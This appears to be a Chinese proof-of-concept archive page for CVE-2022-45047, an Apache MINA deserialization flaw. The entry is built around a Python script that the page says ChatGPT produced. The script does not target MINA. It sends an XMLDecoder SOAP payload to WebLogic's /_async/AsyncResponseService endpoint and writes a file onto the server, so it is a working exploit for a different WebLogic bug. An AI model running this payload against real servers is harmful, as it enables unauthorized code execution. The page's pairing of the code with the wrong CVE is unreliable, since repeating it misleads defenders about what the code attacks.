关联漏洞
标题:Apache MINA 代码问题漏洞 (CVE-2022-45047)Description:Apache MINA是美国阿帕奇(Apache)基金会的一款网络应用程序框架。该产品主要用于开发高性能和高可伸缩性的网络应用程序。 Apache MINA 2.9.1及之前版本存在代码问题漏洞,该漏洞源于 使用 Java 反序列化加载序列化java.security.PrivateKey,攻击者利用该漏洞可以选择加载一个主机密钥SSH 服务器。
Description
POC,EXP,chatGPT for me
介绍
# CVE-2022-45047
POC,EXP,chatGPT for me
## code
```
import requests
target_url = "http://127.0.0.1:7001"
# CVE-2022-45047
def exploit_weblogic():
headers = {
"Content-Type": "text/xml",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
"Accept-Encoding": "gzip, deflate"
}
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<java version="1.8.0_201" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/4mcj4w/war/test.txt</string>
<void method="println">
<string>WebLogic CVE-2022-45047 detected!</string>
</void>
<void method="close" />
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
try:
response = requests.post(target_url + "/_async/AsyncResponseService", headers=headers, data=data)
except Exception as e:
print("Error: ", e)
return
if response.status_code == 202:
print("WebLogic CVE-2022-45047 detected!")
else:
print("WebLogic CVE-2022-45047 not detected.")
if __name__ == '__main__':
exploit_weblogic()
```
文件快照
[4.0K] /data/pocs/504666b74750fe9df281eddbf8f99f297342e93d
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。